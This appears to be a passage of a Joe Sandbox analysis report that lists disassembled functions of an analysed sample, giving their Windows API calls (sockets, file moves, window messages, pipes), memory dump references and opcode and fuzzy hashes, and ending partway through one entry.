                                        Function 00C710B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                          • Part of subcall function 00C7304E: _wcslen.LIBCMT ref: 00C7309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C71112
                                        • WSAGetLastError.WSOCK32 ref: 00C71121
                                        • WSAGetLastError.WSOCK32 ref: 00C711C9
                                        • closesocket.WSOCK32(00000000), ref: 00C711F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: d4abc5a537db1b984ed3c0856422ed70214bfd3364b293e53dc7e9ac267bc25d
                                        • Instruction ID: d65987870856a24af51313f205d85bcaff18c0e5440ccb9f497b378d5e09ffb9
                                        • Opcode Fuzzy Hash: d4abc5a537db1b984ed3c0856422ed70214bfd3364b293e53dc7e9ac267bc25d
                                        • Instruction Fuzzy Hash: D541B431600208AFDB109F58C885BADBBE9EF45364F58C059FD199F292C774AE45CBA1
                                        Function 00C5CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5CF22,?), ref: 00C5DDFD
                                          • Part of subcall function 00C5DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5CF22,?), ref: 00C5DE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C5CF45
                                        • MoveFileW.KERNEL32(?,?), ref: 00C5CF7F
                                        • _wcslen.LIBCMT ref: 00C5D005
                                        • _wcslen.LIBCMT ref: 00C5D01B
                                        • SHFileOperationW.SHELL32(?), ref: 00C5D061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: 8d1d8f77c2005441cb8541a6c6b175345ecfc4f1fb201a162c01dcdd8814a9af
                                        • Instruction ID: 1dbb2589edadddf14d502f4ac700edb2ac77d41b082ff5ed31da8dc1af1a8fa1
                                        • Opcode Fuzzy Hash: 8d1d8f77c2005441cb8541a6c6b175345ecfc4f1fb201a162c01dcdd8814a9af
                                        • Instruction Fuzzy Hash: 584142759052189FDF16EBA4DDC1ADEB7B8EF48381F0000E6E905EB142EA34A7C8DB54
                                        Function 00C82DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C82E1C
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82E4F
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82E84
                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C82EB6
                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C82EE0
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C82EF1
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C82F0B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: 390547affb94095cdff438ba5a8faa0d2ce1c8d4152910813bd805715327fab1
                                        • Instruction ID: 2f17c704fecd75b36893702b0cf2dbe5f89bee4d1dfcd8bc471e686ae950329c
                                        • Opcode Fuzzy Hash: 390547affb94095cdff438ba5a8faa0d2ce1c8d4152910813bd805715327fab1
                                        • Instruction Fuzzy Hash: 43312430604250AFDB21DF59DC88F6937E0FB8A725F190165F9118F2B2CB71AD40DB18
                                        Function 00C57726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C5778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 00C57792
                                        • SysAllocString.OLEAUT32(?), ref: 00C577B0
                                        • SysFreeString.OLEAUT32(?), ref: 00C577B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C577DE
                                        • SysAllocString.OLEAUT32(?), ref: 00C577EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: e1673ab127015316c01cef4f86e52a9c47ac715e9c58ba4ce141c0fea246efe3
                                        • Instruction ID: fa5155c3f40acbfb9b723c2f0e49ba0ff8d2bfe71cc7c4dc1722235fcf9c1f65
                                        • Opcode Fuzzy Hash: e1673ab127015316c01cef4f86e52a9c47ac715e9c58ba4ce141c0fea246efe3
                                        • Instruction Fuzzy Hash: E621A17A604219AFDB11DFA8EC88EBF73ACEB097A47008125BD14DB190D670DDC5C768
                                        Function 00C577FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C57868
                                        • SysAllocString.OLEAUT32(00000000), ref: 00C5786B
                                        • SysAllocString.OLEAUT32 ref: 00C5788C
                                        • SysFreeString.OLEAUT32 ref: 00C57895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C578AF
                                        • SysAllocString.OLEAUT32(?), ref: 00C578BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 12f277fe6e2210a4c1fc52fd9c94d3a86e15dcae2d4c3c6bb10b07e184b9e207
                                        • Instruction ID: 40685dca9f0b231447681643d0d6fcf2716eed4b33e552f5c005cab2f549d8b6
                                        • Opcode Fuzzy Hash: 12f277fe6e2210a4c1fc52fd9c94d3a86e15dcae2d4c3c6bb10b07e184b9e207
                                        • Instruction Fuzzy Hash: 07219235604114AFDB109FA9EC8CEBA77ACEB087607108125F915DB2E1D674DDC5CB78
                                        Function 00C604D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C604F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C6052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 9e2c22cc6a4304c114832d5b18e5872a08ad587b1799843d4fc5c30ae7b627c2
                                        • Instruction ID: f6650e57723655de7d738c234da1d7836ee1d2199ab7d36a84f1479cc251f116
                                        • Opcode Fuzzy Hash: 9e2c22cc6a4304c114832d5b18e5872a08ad587b1799843d4fc5c30ae7b627c2
                                        • Instruction Fuzzy Hash: 45216D75500305ABDF309F69DC85B9B77A4AF44724F304A29F8B2E62E0E7709A40DF28
                                        Function 00C605A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C605C6
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 477e324faa1747dd2f4deed32e285d6261ba25c17f8466ef17359af4b4a7bbf1
                                        • Instruction ID: 3ad9fbddee4ee25f73a9666dedc29d2a9e0f50bdefb2631816896db518d95883
                                        • Opcode Fuzzy Hash: 477e324faa1747dd2f4deed32e285d6261ba25c17f8466ef17359af4b4a7bbf1
                                        • Instruction Fuzzy Hash: 6C212A755002059BDB309F69D884A9B77A8AF95721F300A19FCB1B62E0D7B0DA61CB24
                                        Function 00C840AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                          • Part of subcall function 00BF600E: GetStockObject.GDI32(00000011), ref: 00BF6060
                                          • Part of subcall function 00BF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C84112
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C8411F
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C8412A
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C84139
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C84145
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: a1ff3a90b5898300ed3a6cadc75b9ce43ca1f19b4c87cbd876d191d47f0c18b9
                                        • Instruction ID: d8244fef49274d16bced29be07ad1f057b95f14e8be78cdde7765c3ead3ffdad
                                        • Opcode Fuzzy Hash: a1ff3a90b5898300ed3a6cadc75b9ce43ca1f19b4c87cbd876d191d47f0c18b9
                                        • Instruction Fuzzy Hash: E51193B115021A7EEF119F64CC85EEB7F5DEF09798F014110FA18A2090CB729C21DBA4
                                        Function 00C2D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C2D7A3: _free.LIBCMT ref: 00C2D7CC
                                        • _free.LIBCMT ref: 00C2D82D
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2D838
                                        • _free.LIBCMT ref: 00C2D843
                                        • _free.LIBCMT ref: 00C2D897
                                        • _free.LIBCMT ref: 00C2D8A2
                                        • _free.LIBCMT ref: 00C2D8AD
                                        • _free.LIBCMT ref: 00C2D8B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction ID: 403dd8f44d73faedc42a4698ca4bfb2b72e6693df4abc881dab0afe416bb1d88
                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                        • Instruction Fuzzy Hash: 7B116371540B24BAD521BFF0EC47FCB7BDC6F14B00F800825B2DAE6892DA79B5456750
                                        Function 00C5DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5DA74
                                        • LoadStringW.USER32(00000000), ref: 00C5DA7B
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5DA91
                                        • LoadStringW.USER32(00000000), ref: 00C5DA98
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5DADC
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C5DAB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: e14b89ab0be7553b745b4bac31086070b83d22cc282b0e719a95ed2d855996c3
                                        • Instruction ID: 721d9dbb6c794f79e0e3f8ab79c1f4cfc73fe0829f7d725e26c7387ceb305334
                                        • Opcode Fuzzy Hash: e14b89ab0be7553b745b4bac31086070b83d22cc282b0e719a95ed2d855996c3
                                        • Instruction Fuzzy Hash: 2F0162F65002087FE710ABA09DC9FEB326CE708701F4004A2B706E2051E6749E844F78
                                        Function 00C6096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(00F0FA40,00F0FA40), ref: 00C6097B
                                        • EnterCriticalSection.KERNEL32(00F0FA20,00000000), ref: 00C6098D
                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C6099B
                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C609A9
                                        • CloseHandle.KERNEL32(00000000), ref: 00C609B8
                                        • InterlockedExchange.KERNEL32(00F0FA40,000001F6), ref: 00C609C8
                                        • LeaveCriticalSection.KERNEL32(00F0FA20), ref: 00C609CF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 185948c16241080d186b781d0b02b82cdbb6c3b8274cddcc69886f744a9c5657
                                        • Instruction ID: 5d772227257830ec472ffc4fc53d92e166a7908d69a8623065a8c9c69970964f
                                        • Opcode Fuzzy Hash: 185948c16241080d186b781d0b02b82cdbb6c3b8274cddcc69886f744a9c5657
                                        • Instruction Fuzzy Hash: 17F0C932442A12ABD7515BA4EECDBDABB29BF05712F502025F202A08A1C7759975CFA4
                                        Function 00C71C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C71DC0
                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C71DE1
                                        • WSAGetLastError.WSOCK32 ref: 00C71DF2
                                        • htons.WSOCK32(?,?,?,?,?), ref: 00C71EDB
                                        • inet_ntoa.WSOCK32(?), ref: 00C71E8C
                                          • Part of subcall function 00C539E8: _strlen.LIBCMT ref: 00C539F2
                                          • Part of subcall function 00C73224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C6EC0C), ref: 00C73240
                                        • _strlen.LIBCMT ref: 00C71F35
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                        • String ID:
                                        • API String ID: 3203458085-0
                                        • Opcode ID: 84eea3d9dcacb4b20cb5b190a8927b28e434d04fe96829b4f29e18ba48e7e888
                                        • Instruction ID: ca2c52ecd3b26cb809e80648cc14fcd5e96ea3814f29e9cab9107e56fbbd1f4f
                                        • Opcode Fuzzy Hash: 84eea3d9dcacb4b20cb5b190a8927b28e434d04fe96829b4f29e18ba48e7e888
                                        • Instruction Fuzzy Hash: E5B1C231204340AFC324DF68C895F2A7BE5AF84318F58854CF96A5B2E2CB31EE45CB91
                                        Function 00BF5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00BF5D30
                                        • GetWindowRect.USER32(?,?), ref: 00BF5D71
                                        • ScreenToClient.USER32(?,?), ref: 00BF5D99
                                        • GetClientRect.USER32(?,?), ref: 00BF5ED7
                                        • GetWindowRect.USER32(?,?), ref: 00BF5EF8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: afcac04dabd2f89df3ab8074e4464729bcbc3170fed62b62b6c05f63711d2e0a
                                        • Instruction ID: f5a923bfdbb077ff0fb30b7aea5610acc3de63be4aac252b641add1ececb8538
                                        • Opcode Fuzzy Hash: afcac04dabd2f89df3ab8074e4464729bcbc3170fed62b62b6c05f63711d2e0a
                                        • Instruction Fuzzy Hash: D8B14634A10B4ADBDB24CFA9C4807EAB7F1FF48310F14841AE9A9D7250DB34AA55DB54
                                        Function 00C201B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 00C200BA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C200D6
                                        • __allrem.LIBCMT ref: 00C200ED
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C2010B
                                        • __allrem.LIBCMT ref: 00C20122
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C20140
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction ID: c56ceb3bdcac6e5c0e265101edcc783ba97b1ca7d5de1716df6bd4e9d71f5fee
                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                        • Instruction Fuzzy Hash: A6811872A007169FE7249F68DC41BAF73E9AF42324F24413EF521D6A82E7B0DE41A750
                                        Function 00C261FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C182D9,00C182D9,?,?,?,00C2644F,00000001,00000001,8BE85006), ref: 00C26258
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C2644F,00000001,00000001,8BE85006,?,?,?), ref: 00C262DE
